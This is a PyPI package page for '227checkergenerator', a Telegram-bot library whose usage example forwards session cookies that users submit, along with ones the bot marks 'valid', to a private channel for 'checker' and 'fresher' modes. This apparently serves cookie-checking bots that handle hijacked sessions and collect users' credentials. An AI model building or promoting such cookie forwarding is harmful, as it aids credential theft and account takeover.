Skip to main content

227checkergenerator

Cookie logging library for Telegram bots. Sends incoming/outgoing cookies to a private Telegram channel for debugging.

Installation

pip install 227checkergenerator

Usage

from aiogram import Bot
from checker227 import checker228

bot = Bot(token="YOUR_TOKEN")
logger = checker228(bot, channel_id=-5231635826)

# Log incoming cookies (user sent to bot)
await logger.log_incoming(
    user_id=123456,
    cookies=["cookie1", "cookie2"],
    mode="checker",
    username="user123"
)

# Log outgoing cookies (bot sends to user)
await logger.log_outgoing(
    user_id=123456,
    cookies=["valid_cookie1"],
    mode="checker",
    status="valid"
)

# Log errors
await logger.log_error(
    user_id=123456,
    mode="fresher",
    error="Connection timeout"
)

Features

  • Async queue-based sending (non-blocking)
  • Auto file upload for large cookie lists (>5 cookies)
  • HTML formatted messages
  • Error logging
  • Background worker with rate limiting

Release files for 227checkergenerator 1.0.1

For a detailed explanation of source distributions (sdists) and built distributions (wheels), please see the package formats documentation.

Source distribution (sdist)

Source distribution for 227checkergenerator 1.0.1
File Size Uploaded
227checkergenerator-1.0.1.tar.gz 3.5 kB Details

Built distribution (wheel)

Table of built distributions (wheels) for 227checkergenerator 1.0.1
File Interpreter ABI Platform
227checkergenerator-1.0.1-py3-none-any.whl Python 3 none any Details

Total release size:7.6 kB

Release files / 227checkergenerator-1.0.1.tar.gz

Download URL 227checkergenerator-1.0.1.tar.gz
Size 3.5 kB
Tags Source
SHA-256 checksum
How to use checksums
372e656b9898a2436677a3b3ed2b65bd026cb06141adebe3b16bd0af0502ab4b
BLAKE2b-256 checksum
How to use checksums
094d4d8d92d42c9512980a28ace677ff73e6ea077a22293929c185b6864fbdb6
Upload date
Uploaded using Trusted Publishing?
What is trusted publishing?
No
Uploaded via twine/6.2.0 CPython/3.12.8

Release files / 227checkergenerator-1.0.1-py3-none-any.whl

Download URL 227checkergenerator-1.0.1-py3-none-any.whl
Size 4.1 kB
Tags Python 3
SHA-256 checksum
How to use checksums
6e04e278dac68a19b2c718158241e79b1933fded78cc916d77c82eedcf7252b5
BLAKE2b-256 checksum
How to use checksums
8745610432b95994f25b928189d6e655399278b81d07543f99b9741f3a4f37b1
Upload date
Uploaded using Trusted Publishing?
What is trusted publishing?
No
Uploaded via twine/6.2.0 CPython/3.12.8

Release history Release notifications | RSS feed

This release

1.0.1 This release

2 release files

1.0.0

2 release files

Anthropic, PBC Visionary sponsor Bloomberg Visionary sponsor Hudson River Trading Visionary sponsor Meta Visionary sponsor NVIDIA Visionary sponsor Microsoft Sustainability sponsor Depot Continuous Integration AWS Cloud computing and Security Sponsor Datadog Monitoring Fastly CDN Google Download Analytics Sentry Error logging StatusPage Status page